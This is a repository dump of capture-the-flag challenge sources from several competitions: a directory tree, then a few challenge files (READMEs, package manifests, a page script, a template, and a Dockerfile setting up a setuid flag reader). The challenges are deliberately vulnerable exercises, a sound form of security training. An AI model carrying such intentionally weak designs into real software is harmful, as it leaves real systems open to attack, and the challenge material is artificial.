├── 1337UP-LIVE
    ├── DeadTube
    │   ├── README.md
    │   ├── index.js
    │   ├── package-lock.json
    │   ├── package.json
    │   └── public
    │   │   ├── download.jpg
    │   │   ├── index.html
    │   │   └── kek.png
    └── contact-alex
    │   ├── README.md
    │   ├── bot.js
    │   ├── index.js
    │   ├── package.json
    │   ├── public
    │       ├── kirby-pink.gif
    │       └── script.js
    │   └── views
    │       ├── home.hbs
    │       └── login.hbs
├── DiceCTF-2022
    ├── denoblog
    │   ├── Dockerfile
    │   ├── README.md
    │   ├── challenge
    │   │   ├── app.ts
    │   │   ├── langs
    │   │   │   ├── en
    │   │   │   └── es
    │   │   └── views
    │   │   │   └── index.ejs
    │   ├── config
    │   │   ├── nginx.conf
    │   │   └── supervisord.conf
    │   ├── flag.txt
    │   └── readflag
    ├── notekeeper
    │   ├── Dockerfile
    │   ├── README.md
    │   ├── hint.js
    │   ├── index.js
    │   ├── package.json
    │   ├── pages
    │   │   ├── home.html
    │   │   └── login.html
    │   ├── public
    │   │   ├── assets
    │   │   │   ├── bootstrap
    │   │   │   │   ├── css
    │   │   │   │   │   └── bootstrap.min.css
    │   │   │   │   └── js
    │   │   │   │   │   └── bootstrap.min.js
    │   │   │   ├── css
    │   │   │   │   └── styles.css
    │   │   │   └── fonts
    │   │   │   │   ├── fa-brands-400.eot
    │   │   │   │   ├── fa-brands-400.svg
    │   │   │   │   ├── fa-brands-400.ttf
    │   │   │   │   ├── fa-brands-400.woff
    │   │   │   │   ├── fa-brands-400.woff2
    │   │   │   │   ├── fa-regular-400.eot
    │   │   │   │   ├── fa-regular-400.svg
    │   │   │   │   ├── fa-regular-400.ttf
    │   │   │   │   ├── fa-regular-400.woff
    │   │   │   │   ├── fa-regular-400.woff2
    │   │   │   │   ├── fa-solid-900.eot
    │   │   │   │   ├── fa-solid-900.svg
    │   │   │   │   ├── fa-solid-900.ttf
    │   │   │   │   ├── fa-solid-900.woff
    │   │   │   │   ├── fa-solid-900.woff2
    │   │   │   │   └── fontawesome-all.min.css
    │   │   └── script.js
    │   ├── routes
    │   │   └── api.js
    │   ├── src
    │   │   ├── db.js
    │   │   ├── jwt.js
    │   │   └── utils.js
    │   └── uploads
    │   │   └── flag.mp3
    └── vm-calc
    │   ├── Dockerfile
    │   ├── README.md
    │   ├── flag.txt
    │   ├── index.js
    │   ├── package.json
    │   └── views
    │       ├── admin.hbs
    │       └── index.hbs
├── DiceCTF-2023
    ├── pwn
    │   └── chessrs
    │   │   ├── adminbot-test.js
    │   │   ├── adminbot.js
    │   │   ├── challenge.yml
    │   │   ├── challenge
    │   │       ├── Dockerfile
    │   │       ├── app
    │   │       │   ├── Cargo.lock
    │   │       │   ├── Cargo.toml
    │   │       │   ├── src
    │   │       │   │   └── main.rs
    │   │       │   └── static
    │   │       │   │   ├── css
    │   │       │   │       └── styles.css
    │   │       │   │   ├── engine.html
    │   │       │   │   ├── img
    │   │       │   │       └── chesspieces
    │   │       │   │       │   └── wikipedia
    │   │       │   │       │       ├── LICENSE.txt
    │   │       │   │       │       ├── bB.png
    │   │       │   │       │       ├── bK.png
    │   │       │   │       │       ├── bN.png
    │   │       │   │       │       ├── bP.png
    │   │       │   │       │       ├── bQ.png
    │   │       │   │       │       ├── bR.png
    │   │       │   │       │       ├── wB.png
    │   │       │   │       │       ├── wK.png
    │   │       │   │       │       ├── wN.png
    │   │       │   │       │       ├── wP.png
    │   │       │   │       │       ├── wQ.png
    │   │       │   │       │       └── wR.png
    │   │       │   │   ├── index.html
    │   │       │   │   ├── js
    │   │       │   │       ├── chess_wasm.js
    │   │       │   │       ├── chess_wasm_bg.wasm
    │   │       │   │       └── game.js
    │   │       │   │   └── mp3
    │   │       │   │       └── move.mp3
    │   │       ├── build.sh
    │   │       └── chess-wasm
    │   │       │   ├── Cargo.lock
    │   │       │   ├── Cargo.toml
    │   │       │   └── src
    │   │       │       ├── game.rs
    │   │       │       ├── handler.rs
    │   │       │       └── lib.rs
    │   │   ├── chessrs.tar.gz
    │   │   ├── flag.txt
    │   │   └── make_handout.sh
    └── web
    │   ├── jwtjail
    │       ├── challenge.yml
    │       ├── challenge
    │       │   ├── Dockerfile
    │       │   ├── app.js
    │       │   ├── flag.txt
    │       │   ├── package.json
    │       │   ├── public
    │       │   │   └── index.html
    │       │   └── readflag
    │       ├── jwtjail.tar.gz
    │       └── make_handout.sh
    │   ├── recursive-csp
    │       ├── adminbot.js
    │       ├── challenge.yml
    │       ├── challenge
    │       │   ├── Dockerfile
    │       │   └── index.php
    │       ├── flag.txt
    │       └── solve
    │       │   ├── Cargo.lock
    │       │   ├── Cargo.toml
    │       │   └── src
    │       │       └── main.rs
    │   └── unfinished
    │       ├── challenge.yml
    │       ├── challenge
    │           ├── app
    │           │   ├── Dockerfile
    │           │   ├── app.js
    │           │   ├── package.json
    │           │   └── static
    │           │   │   ├── dashboard.html
    │           │   │   └── index.html
    │           ├── docker-compose.yml
    │           └── mongo
    │           │   ├── Dockerfile
    │           │   └── init.js
    │       ├── make_handout.sh
    │       └── unfinished.tar.gz
├── DiceCTF-at-HOPE-2022
    └── payment-pal
    │   ├── Dockerfile
    │   ├── admin-bot.js
    │   ├── index.js
    │   ├── package.json
    │   ├── public
    │       ├── assets
    │       │   └── script.js
    │       └── index.html
    │   └── src
    │       ├── auth.js
    │       ├── db.js
    │       └── graphql.js
├── LICENSE
├── README.md
├── RaRCTF-2021
    └── SecureStorage
    │   ├── README.md
    │   ├── admin
    │       ├── .dockerignore
    │       ├── Dockerfile
    │       ├── admin.js
    │       ├── index.js
    │       ├── package-lock.json
    │       └── package.json
    │   ├── chall
    │       ├── .dockerignore
    │       ├── Dockerfile
    │       ├── index.js
    │       ├── package-lock.json
    │       ├── package.json
    │       ├── public
    │       │   ├── assets
    │       │   │   ├── bootstrap
    │       │   │   │   └── css
    │       │   │   │   │   └── bootstrap.min.css
    │       │   │   ├── css
    │       │   │   │   └── styles.css
    │       │   │   └── img
    │       │   │   │   └── vault.png
    │       │   └── script.js
    │       ├── routes
    │       │   └── api.js
    │       ├── secure_safe
    │       │   ├── assets
    │       │   │   ├── LICENSE.txt
    │       │   │   ├── css
    │       │   │   │   ├── bootstrap.min.css
    │       │   │   │   └── fontawesome.min.css
    │       │   │   └── webfonts
    │       │   │   │   ├── fa-brands-400.eot
    │       │   │   │   ├── fa-brands-400.svg
    │       │   │   │   ├── fa-brands-400.ttf
    │       │   │   │   ├── fa-brands-400.woff
    │       │   │   │   ├── fa-brands-400.woff2
    │       │   │   │   ├── fa-regular-400.eot
    │       │   │   │   ├── fa-regular-400.svg
    │       │   │   │   ├── fa-regular-400.ttf
    │       │   │   │   ├── fa-regular-400.woff
    │       │   │   │   ├── fa-regular-400.woff2
    │       │   │   │   ├── fa-solid-900.eot
    │       │   │   │   ├── fa-solid-900.svg
    │       │   │   │   ├── fa-solid-900.ttf
    │       │   │   │   ├── fa-solid-900.woff
    │       │   │   │   └── fa-solid-900.woff2
    │       │   └── secure.js
    │       └── views
    │       │   ├── home.hbs
    │       │   ├── index.hbs
    │       │   ├── layout.hbs
    │       │   ├── login.hbs
    │       │   ├── register.hbs
    │       │   ├── secure.hbs
    │       │   └── submit.hbs
    │   └── docker-compose.yml
├── Real-World-CTF-2023
    └── the_cult_of_8bit
    │   ├── Dockerfile
    │   ├── README.md
    │   ├── bot
    │       └── bot.js
    │   ├── code
    │       ├── app.js
    │       ├── package-lock.json
    │       ├── package.json
    │       ├── routes
    │       │   └── api.js
    │       ├── src
    │       │   ├── db.js
    │       │   └── middleware.js
    │       ├── static
    │       │   └── assets
    │       │   │   └── img
    │       │   │       ├── 48x48M.png
    │       │   │       ├── 48x48Sorriso.png
    │       │   │       ├── 64x64blind.png
    │       │   │       └── 9bc27292880429.5e569ff84e4d0.gif
    │       └── views
    │       │   ├── home.ejs
    │       │   ├── login.ejs
    │       │   ├── post.ejs
    │       │   ├── register.ejs
    │       │   └── report.ejs
    │   ├── docker-compose.yml
    │   └── setup.sh
├── SekaiCTF-2022
    ├── crab-commodities
    │   ├── Dockerfile
    │   └── chall
    │   │   ├── Cargo.lock
    │   │   ├── Cargo.toml
    │   │   └── src
    │   │       ├── api.rs
    │   │       ├── auth.rs
    │   │       ├── game.rs
    │   │       ├── main.rs
    │   │       └── templates
    │   │           ├── game.html
    │   │           ├── index.html
    │   │           ├── login.html
    │   │           └── register.html
    ├── obligatory-calc
    │   ├── Dockerfile
    │   ├── adminbot_test.js
    │   ├── app.js
    │   ├── package-lock.json
    │   ├── package.json
    │   ├── public
    │   │   └── css
    │   │   │   ├── styles.css
    │   │   │   └── water.css
    │   └── views
    │   │   ├── calc.hbs
    │   │   └── home.hbs
    └── safelist
    │   ├── Dockerfile
    │   ├── adminbot_test.js
    │   ├── app.js
    │   ├── package-lock.json
    │   ├── package.json
    │   ├── public
    │       ├── css
    │       │   └── marx.css
    │       └── js
    │       │   └── purify.js
    │   └── views
    │       └── home.hbs
├── SekaiCTF-2023
    ├── golfjail
    │   ├── README.md
    │   ├── challenge
    │   │   ├── Dockerfile
    │   │   ├── challenge
    │   │   │   └── index.php
    │   │   └── config
    │   │   │   ├── fpm.conf
    │   │   │   ├── nginx.conf
    │   │   │   └── supervisord.conf
    │   ├── dist
    │   │   └── golfjail.php
    │   ├── solution
    │   │   └── solve.txt
    │   └── values.yaml
    └── leaklessnote
    │   ├── .values.yaml
    │   ├── README.md
    │   ├── challenge
    │       ├── Dockerfile
    │       ├── challenge
    │       │   ├── db.php
    │       │   ├── index.php
    │       │   ├── login.php
    │       │   ├── post.php
    │       │   ├── register.php
    │       │   └── search.php
    │       └── config
    │       │   ├── fpm.conf
    │       │   ├── nginx.conf
    │       │   ├── php.ini
    │       │   └── supervisord.conf
    │   ├── deployment.yaml
    │   ├── dist
    │       ├── adminbot.js
    │       └── leaklessnote.tar.gz
    │   └── solution
    │       └── solve.html
├── corCTF-2021
    ├── LICENSE
    ├── misc
    │   ├── flagbot
    │   │   ├── README.md
    │   │   ├── discord
    │   │   │   ├── .dockerignore
    │   │   │   ├── Dockerfile
    │   │   │   ├── index.js
    │   │   │   ├── package-lock.json
    │   │   │   └── package.json
    │   │   ├── docker-compose.yml
    │   │   └── web
    │   │   │   ├── .dockerignore
    │   │   │   ├── Dockerfile
    │   │   │   ├── index.js
    │   │   │   ├── package-lock.json
    │   │   │   └── package.json
    │   └── smogofwar
    │   │   ├── README.md
    │   │   ├── chall
    │   │       ├── Dockerfile
    │   │       ├── app.py
    │   │       ├── enemy.py
    │   │       ├── game.py
    │   │       ├── requirements.txt
    │   │       ├── start.sh
    │   │       └── static
    │   │       │   ├── LICENSE.md
    │   │       │   ├── bootstrap
    │   │       │       └── css
    │   │       │       │   └── bootstrap.min.css
    │   │       │   ├── css
    │   │       │       ├── chessboard-1.0.0.min.css
    │   │       │       └── styles.css
    │   │       │   ├── img
    │   │       │       └── chesspieces
    │   │       │       │   └── wikipedia
    │   │       │       │       ├── bB.png
    │   │       │       │       ├── bK.png
    │   │       │       │       ├── bN.png
    │   │       │       │       ├── bP.png
    │   │       │       │       ├── bQ.png
    │   │       │       │       ├── bR.png
    │   │       │       │       ├── wB.png
    │   │       │       │       ├── wK.png
    │   │       │       │       ├── wN.png
    │   │       │       │       ├── wP.png
    │   │       │       │       ├── wQ.png
    │   │       │       │       └── wR.png
    │   │       │   ├── index.html
    │   │       │   ├── js
    │   │       │       ├── chessboard-1.0.0.min.js
    │   │       │       └── game.js
    │   │       │   └── mp3
    │   │       │       └── move.mp3
    │   │   └── docker-compose.yml
    ├── rev
    │   └── babyrev
    │   │   ├── README.md
    │   │   └── babyrev
    └── web
    │   ├── blogme
    │       ├── README.md
    │       ├── chall
    │       │   ├── .dockerignore
    │       │   ├── Dockerfile
    │       │   ├── index.js
    │       │   ├── package-lock.json
    │       │   ├── package.json
    │       │   ├── partials
    │       │   │   ├── footer.ejs
    │       │   │   └── header.ejs
    │       │   ├── public
    │       │   │   └── assets
    │       │   │   │   ├── bootstrap
    │       │   │   │       ├── css
    │       │   │   │       │   └── bootstrap.min.css
    │       │   │   │       └── js
    │       │   │   │       │   └── bootstrap.min.js
    │       │   │   │   ├── css
    │       │   │   │       └── styles.css
    │       │   │   │   └── js
    │       │   │   │       ├── jquery.min.js
    │       │   │   │       └── script.js
    │       │   ├── routes
    │       │   │   ├── api.js
    │       │   │   └── index.js
    │       │   ├── src
    │       │   │   ├── db.js
    │       │   │   └── util.js
    │       │   ├── uploads
    │       │   │   └── .gitkeep
    │       │   └── views
    │       │   │   ├── comment.ejs
    │       │   │   ├── index.ejs
    │       │   │   ├── login.ejs
    │       │   │   ├── post.ejs
    │       │   │   ├── posts.ejs
    │       │   │   ├── profile.ejs
    │       │   │   ├── register.ejs
    │       │   │   └── remove.ejs
    │       ├── docker-compose.yml
    │       └── hint.js
    │   ├── buyme
    │       ├── README.md
    │       ├── chall
    │       │   ├── .dockerignore
    │       │   ├── Dockerfile
    │       │   ├── db.js
    │       │   ├── flags.json
    │       │   ├── index.js
    │       │   ├── package-lock.json
    │       │   ├── package.json
    │       │   ├── public
    │       │   │   └── assets
    │       │   │   │   ├── bootstrap
    │       │   │   │       └── css
    │       │   │   │       │   └── bootstrap.min.css
    │       │   │   │   └── css
    │       │   │   │       └── styles.css
    │       │   ├── routes
    │       │   │   └── api.js
    │       │   └── views
    │       │   │   ├── flags.hbs
    │       │   │   ├── index.hbs
    │       │   │   └── layout.hbs
    │       └── docker-compose.yml
    │   ├── msgme
    │       ├── README.md
    │       ├── chall
    │       │   ├── .dockerignore
    │       │   ├── Dockerfile
    │       │   ├── index.js
    │       │   ├── package-lock.json
    │       │   ├── package.json
    │       │   ├── public
    │       │   │   ├── chat.js
    │       │   │   └── styles.css
    │       │   ├── routes
    │       │   │   └── chat.js
    │       │   ├── src
    │       │   │   ├── commands.js
    │       │   │   ├── commands
    │       │   │   │   ├── 8ball.js
    │       │   │   │   ├── coinflip.js
    │       │   │   │   ├── flag.js
    │       │   │   │   ├── help.js
    │       │   │   │   ├── math.js
    │       │   │   │   ├── roll.js
    │       │   │   │   └── secret.js
    │       │   │   └── ws.js
    │       │   └── views
    │       │   │   ├── chat.hbs
    │       │   │   └── sandbox.hbs
    │       ├── docker-compose.yml
    │       └── hint.js
    │   ├── phpme
    │       ├── Dockerfile
    │       ├── README.md
    │       ├── challenge
    │       │   ├── index.php
    │       │   └── secret.php
    │       └── config
    │       │   ├── fpm.conf
    │       │   ├── nginx.conf
    │       │   └── supervisord.conf
    │   ├── readme
    │       ├── README.md
    │       ├── chall
    │       │   ├── .dockerignore
    │       │   ├── Dockerfile
    │       │   ├── flag.txt
    │       │   ├── index.js
    │       │   ├── package-lock.json
    │       │   ├── package.json
    │       │   └── public
    │       │   │   └── index.html
    │       └── docker-compose.yml
    │   ├── saasme
    │       ├── README.md
    │       ├── chall
    │       │   ├── .dockerignore
    │       │   ├── Dockerfile
    │       │   ├── browser.js
    │       │   ├── index.js
    │       │   ├── package.json
    │       │   ├── private.js
    │       │   ├── public.js
    │       │   ├── queue.js
    │       │   ├── schema.js
    │       │   └── static
    │       │   │   ├── assets
    │       │   │       ├── bootstrap
    │       │   │       │   ├── css
    │       │   │       │   │   └── bootstrap.min.css
    │       │   │       │   └── js
    │       │   │       │   │   └── bootstrap.min.js
    │       │   │       ├── css
    │       │   │       │   └── styles.css
    │       │   │       ├── img
    │       │   │       │   └── saasme.jpg
    │       │   │       └── saasme.js
    │       │   │   └── index.html
    │       ├── docker-compose.yml
    │       └── flag
    │       │   ├── Dockerfile
    │       │   └── send_flag.sh
    │   └── styleme
    │       ├── README.md
    │       ├── admin
    │           ├── .dockerignore
    │           ├── Dockerfile
    │           ├── admin.js
    │           ├── entrypoint.sh
    │           ├── extension
    │           │   ├── background.js
    │           │   ├── content.js
    │           │   ├── icon128.png
    │           │   ├── icon16.png
    │           │   ├── icon48.png
    │           │   ├── manifest.json
    │           │   ├── option.js
    │           │   └── options.html
    │           ├── index.js
    │           ├── package-lock.json
    │           ├── package.json
    │           └── startdisplay.sh
    │       ├── admin_test
    │           ├── admin.js
    │           ├── extension
    │           │   ├── background.js
    │           │   ├── content.js
    │           │   ├── icon128.png
    │           │   ├── icon16.png
    │           │   ├── icon48.png
    │           │   ├── manifest.json
    │           │   ├── option.js
    │           │   └── options.html
    │           └── package.json
    │       ├── chall
    │           ├── .dockerignore
    │           ├── Dockerfile
    │           ├── index.js
    │           ├── package-lock.json
    │           ├── package.json
    │           ├── public
    │           │   └── assets
    │           │   │   ├── bootstrap
    │           │   │       ├── css
    │           │   │       │   └── bootstrap.min.css
    │           │   │       └── js
    │           │   │       │   └── bootstrap.min.js
    │           │   │   ├── css
    │           │   │       ├── CodeMirror.min.css
    │           │   │       └── styles.min.css
    │           │   │   ├── fonts
    │           │   │       ├── fa-brands-400.eot
    │           │   │       ├── fa-brands-400.svg
    │           │   │       ├── fa-brands-400.ttf
    │           │   │       ├── fa-brands-400.woff
    │           │   │       ├── fa-brands-400.woff2
    │           │   │       ├── fa-regular-400.eot
    │           │   │       ├── fa-regular-400.svg
    │           │   │       ├── fa-regular-400.ttf
    │           │   │       ├── fa-regular-400.woff
    │           │   │       ├── fa-regular-400.woff2
    │           │   │       ├── fa-solid-900.eot
    │           │   │       ├── fa-solid-900.svg
    │           │   │       ├── fa-solid-900.ttf
    │           │   │       ├── fa-solid-900.woff
    │           │   │       ├── fa-solid-900.woff2
    │           │   │       └── fontawesome-all.min.css
    │           │   │   └── js
    │           │   │       └── jquery.min.js
    │           ├── routes
    │           │   ├── api.js
    │           │   └── styles.js
    │           ├── src
    │           │   └── db.js
    │           └── views
    │           │   ├── create.hbs
    │           │   ├── index.hbs
    │           │   ├── layout.hbs
    │           │   ├── list.hbs
    │           │   ├── login.hbs
    │           │   ├── register.hbs
    │           │   └── submit.hbs
    │       └── docker-compose.yml
├── corCTF-2022
    ├── misc
    │   └── sbxcalc
    │   │   ├── README.md
    │   │   └── task
    │   │       ├── Dockerfile
    │   │       ├── app.js
    │   │       ├── package.json
    │   │       └── views
    │   │           └── index.hbs
    ├── pwn
    │   ├── babypwn
    │   │   ├── README.md
    │   │   ├── src
    │   │   │   ├── Cargo.toml
    │   │   │   └── src
    │   │   │   │   └── main.rs
    │   │   └── task
    │   │   │   ├── Dockerfile
    │   │   │   ├── babypwn
    │   │   │   ├── flag.txt
    │   │   │   └── libc.so.6
    │   └── solidarity
    │   │   ├── README.md
    │   │   ├── src
    │   │       ├── program
    │   │       │   ├── Cargo.toml
    │   │       │   ├── Makefile
    │   │       │   └── src
    │   │       │   │   ├── entrypoint.rs
    │   │       │   │   ├── lib.rs
    │   │       │   │   └── processor.rs
    │   │       └── server
    │   │       │   ├── Cargo.toml
    │   │       │   ├── Makefile
    │   │       │   └── src
    │   │       │       └── main.rs
    │   │   └── task
    │   │       ├── Dockerfile
    │   │       ├── solidarity-server
    │   │       └── solidarity.so
    └── web
    │   ├── jsonquiz
    │       ├── README.md
    │       └── task
    │       │   ├── Dockerfile
    │       │   ├── app.js
    │       │   ├── package.json
    │       │   └── static
    │       │       ├── assets
    │       │           ├── css
    │       │           │   ├── animate.min.css
    │       │           │   ├── bootstrap.min.css
    │       │           │   └── styles.css
    │       │           └── js
    │       │           │   ├── bootstrap.min.js
    │       │           │   └── quiz.js
    │       │       └── index.html
    │   ├── modernblog
    │       ├── README.md
    │       └── task
    │       │   ├── Dockerfile
    │       │   ├── adminbot_test.js
    │       │   ├── client
    │       │       ├── index.html
    │       │       ├── package-lock.json
    │       │       ├── package.json
    │       │       ├── src
    │       │       │   ├── main.jsx
    │       │       │   └── pages
    │       │       │   │   ├── Home.jsx
    │       │       │   │   ├── Index.jsx
    │       │       │   │   ├── Login.jsx
    │       │       │   │   ├── Post.jsx
    │       │       │   │   └── Register.jsx
    │       │       └── vite.config.js
    │       │   └── server
    │       │       ├── index.js
    │       │       ├── package-lock.json
    │       │       ├── package.json
    │       │       └── public
    │       │           ├── assets
    │       │               ├── index.7352e15a.js
    │       │               └── index.7352e15a.js.map
    │       │           └── index.html
    │   ├── rustshop
    │       ├── README.md
    │       └── task
    │       │   ├── Dockerfile
    │       │   ├── client
    │       │       ├── Cargo.lock
    │       │       ├── Cargo.toml
    │       │       ├── Trunk.toml
    │       │       ├── index.html
    │       │       └── src
    │       │       │   ├── components.rs
    │       │       │   ├── components
    │       │       │       ├── hero.rs
    │       │       │       ├── navbar.rs
    │       │       │       ├── shop.rs
    │       │       │       └── user.rs
    │       │       │   ├── main.rs
    │       │       │   ├── routes.rs
    │       │       │   └── routes
    │       │       │       ├── home.rs
    │       │       │       ├── login.rs
    │       │       │       └── register.rs
    │       │   ├── hint.txt
    │       │   └── server
    │       │       ├── Cargo.lock
    │       │       ├── Cargo.toml
    │       │       ├── src
    │       │           ├── auth.rs
    │       │           ├── main.rs
    │       │           ├── routes.rs
    │       │           ├── routes
    │       │           │   └── api.rs
    │       │           └── utils.rs
    │       │       └── static
    │       │           ├── client-165abaf50c73f044.js
    │       │           ├── client-165abaf50c73f044_bg.wasm
    │       │           └── index.html
    │   └── simplewaf
    │       ├── README.md
    │       └── task
    │           ├── Dockerfile
    │           ├── flag.txt
    │           ├── index.html
    │           ├── main.js
    │           ├── package.json
    │           ├── styles.css
    │           └── wow.html
└── corCTF-2023
    ├── blockchain
        ├── baby-wallet
        │   ├── 98-start-gunicorn
        │   ├── Dockerfile
        │   ├── README.md
        │   ├── contracts
        │   │   ├── BabyWallet.sol
        │   │   └── Setup.sol
        │   ├── deploy
        │   │   └── chal.py
        │   ├── eth_sandbox
        │   │   ├── __init__.py
        │   │   ├── auth.py
        │   │   ├── launcher.py
        │   │   └── server.py
        │   └── requirements.txt
        └── tribunal
        │   ├── README.md
        │   ├── challenge
        │       ├── Dockerfile
        │       ├── art.txt
        │       ├── tribunal-server
        │       └── tribunal.so
        │   ├── program
        │       ├── Cargo.lock
        │       ├── Cargo.toml
        │       ├── Makefile
        │       └── src
        │       │   ├── entrypoint.rs
        │       │   ├── lib.rs
        │       │   └── processor.rs
        │   └── server
        │       ├── Cargo.lock
        │       ├── Cargo.toml
        │       ├── Makefile
        │       └── src
        │           └── main.rs
    ├── misc
        ├── msfrogofwar2
        │   ├── README.md
        │   └── chall
        │   │   ├── Dockerfile
        │   │   ├── app.py
        │   │   ├── chesslib.py
        │   │   ├── movegen.py
        │   │   ├── requirements.txt
        │   │   ├── start.sh
        │   │   └── static
        │   │       ├── LICENSE.md
        │   │       ├── bootstrap
        │   │           └── css
        │   │           │   └── bootstrap.min.css
        │   │       ├── css
        │   │           ├── bootstrap.min.css
        │   │           ├── chessboard-1.0.0.min.css
        │   │           ├── styles.css
        │   │           └── sweetalert2.min.css
        │   │       ├── img
        │   │           ├── chesspieces
        │   │           │   └── wikipedia
        │   │           │   │   ├── bB.png
        │   │           │   │   ├── bK.png
        │   │           │   │   ├── bN.png
        │   │           │   │   ├── bP.png
        │   │           │   │   ├── bQ.png
        │   │           │   │   ├── bR.png
        │   │           │   │   ├── wB.png
        │   │           │   │   ├── wK.png
        │   │           │   │   ├── wN.png
        │   │           │   │   ├── wP.png
        │   │           │   │   ├── wQ.png
        │   │           │   │   └── wR.png
        │   │           └── msfrogcursor.png
        │   │       ├── index.html
        │   │       ├── js
        │   │           ├── chessboard-1.0.0.min.js
        │   │           ├── game.js
        │   │           ├── jquery.min.js
        │   │           ├── socket.io.min.js
        │   │           └── sweetalert2.min.js
        │   │       └── mp3
        │   │           └── move.mp3
        └── touch-grass
        │   ├── README.md
        │   └── chall
        │       ├── Dockerfile
        │       ├── app.js
        │       ├── package-lock.json
        │       ├── package.json
        │       └── views
        │           └── index.hbs
    └── web
        ├── crabspace
            ├── README.md
            ├── adminbot.js
            └── chall
            │   ├── Cargo.lock
            │   ├── Cargo.toml
            │   ├── Dockerfile
            │   ├── flag.txt
            │   ├── public
            │       ├── axist.min.css
            │       └── styles.css
            │   ├── src
            │       ├── db.rs
            │       ├── main.rs
            │       ├── routes.rs
            │       ├── routes
            │       │   ├── admin.rs
            │       │   ├── api.rs
            │       │   ├── root.rs
            │       │   └── space.rs
            │       └── utils.rs
            │   └── templates
            │       ├── admin.html
            │       ├── home.html
            │       ├── index.html
            │       ├── layout.html
            │       ├── login.html
            │       ├── register.html
            │       └── space.html
        ├── leakynote
            ├── README.md
            ├── admin_password.txt
            ├── adminbot.js
            └── chall
            │   ├── Dockerfile
            │   ├── challenge
            │       ├── assets
            │       │   ├── milligram.css
            │       │   └── normalize.css
            │       ├── db.php
            │       ├── index.php
            │       ├── login.php
            │       ├── post.php
            │       ├── register.php
            │       └── search.php
            │   └── config
            │       ├── fpm.conf
            │       ├── nginx.conf
            │       ├── php.ini
            │       └── supervisord.conf
        └── pdf-pal
            ├── README.md
            └── chall
                ├── Dockerfile
                ├── app
                    ├── app.py
                    ├── pages
                    │   ├── generate.html
                    │   └── index.html
                    └── requirements.txt
                ├── config
                    ├── nginx.conf
                    └── supervisord.conf
                ├── flag.txt
                └── pdf-gen
                    ├── app.js
                    ├── output
                        └── .gitkeep
                    ├── package-lock.json
                    ├── package.json
                    └── pdfbot.js


/1337UP-LIVE/DeadTube/README.md:
--------------------------------------------------------------------------------
1 | Difficulty: Baby
2 | 
3 | Author: Strellic & BrunoZero


--------------------------------------------------------------------------------
/1337UP-LIVE/DeadTube/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "ssrf",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.17.2",
13 |     "node-fetch": "^3.2.0",
14 |     "private-ip": "^2.3.3"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/1337UP-LIVE/DeadTube/public/download.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/1337UP-LIVE/DeadTube/public/download.jpg


--------------------------------------------------------------------------------
/1337UP-LIVE/DeadTube/public/kek.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/1337UP-LIVE/DeadTube/public/kek.png


--------------------------------------------------------------------------------
/1337UP-LIVE/contact-alex/README.md:
--------------------------------------------------------------------------------
1 | Difficulty: Easy
2 | 
3 | Author: Strellic & BrunoZero


--------------------------------------------------------------------------------
/1337UP-LIVE/contact-alex/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "contact_alex",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "cookie-parser": "^1.4.6",
13 |     "express": "^4.17.2",
14 |     "hbs": "^4.2.0",
15 |     "jwt-simple": "0.5.2",
16 |     "puppeteer": "^13.3.1"
17 |   }
18 | }
19 | 


--------------------------------------------------------------------------------
/1337UP-LIVE/contact-alex/public/kirby-pink.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/1337UP-LIVE/contact-alex/public/kirby-pink.gif


--------------------------------------------------------------------------------
/1337UP-LIVE/contact-alex/public/script.js:
--------------------------------------------------------------------------------
 1 | let search = new URLSearchParams(location.search);
 2 | 
 3 | // messages
 4 | if(search.get("message")) {
 5 |     alert(search.get("message"));
 6 |     history.replaceState(null, document.title, location.pathname);
 7 | }
 8 | 
 9 | if($("#main-modal")[0]) {
10 |     $("#close-btn").on("click", () => {
11 |         $("#main-modal").addClass("hide");
12 |     });
13 | }
14 | 
15 | if($("#report-btn")[0]) {
16 |     $("#report-btn").on("click", () => {
17 |         $("#main-form").attr("action", "/report");
18 |         $("#main-form").submit();
19 |     });
20 | }


--------------------------------------------------------------------------------
/1337UP-LIVE/contact-alex/views/login.hbs:
--------------------------------------------------------------------------------
 1 | <html>
 2 | 
 3 | <head>
 4 |     <link href="https://fonts.googleapis.com/css?family=Press+Start+2P" rel="stylesheet" nonce="{{nonce}}">
 5 |     <link href="https://unpkg.com/nes.css/css/nes.css" rel="stylesheet" nonce="{{nonce}}" />
 6 |     <!-- Alex only likes Chrome. All FireFox users should get out of here! -->
 7 | </head>
 8 | 
 9 | <body>
10 |   <center>
11 |   <section class="nes-container is-dark">
12 |     <section class="message-list">
13 |         <section class="message -left">
14 |           <i class="nes-bcrikko"></i>
15 |           <div class="nes-balloon from-left is-dark">
16 |             <p>Hi, Only Alex can LogIn</p>
17 |           </div>
18 |         </section>
19 |   </center>
20 |   <center>
21 |     <img src="kirby-pink.gif">
22 |   </center>
23 |   <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
24 |   <script src="script.js"></script>
25 | </body>
26 | </html>


--------------------------------------------------------------------------------
/DiceCTF-2022/denoblog/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM denoland/deno
 2 | 
 3 | RUN apt update && apt install -y supervisor nginx
 4 | 
 5 | COPY flag.txt /flag.txt
 6 | COPY readflag /readflag
 7 | 
 8 | RUN chmod 400 /flag.txt
 9 | RUN chmod 6755 /readflag
10 | 
11 | RUN mkdir -p /app
12 | WORKDIR /app
13 | 
14 | COPY challenge .
15 | 
16 | RUN deno compile --allow-read --allow-write --allow-net app.ts
17 | RUN chmod 755 /app/app
18 | 
19 | COPY config/supervisord.conf /etc/supervisord.conf
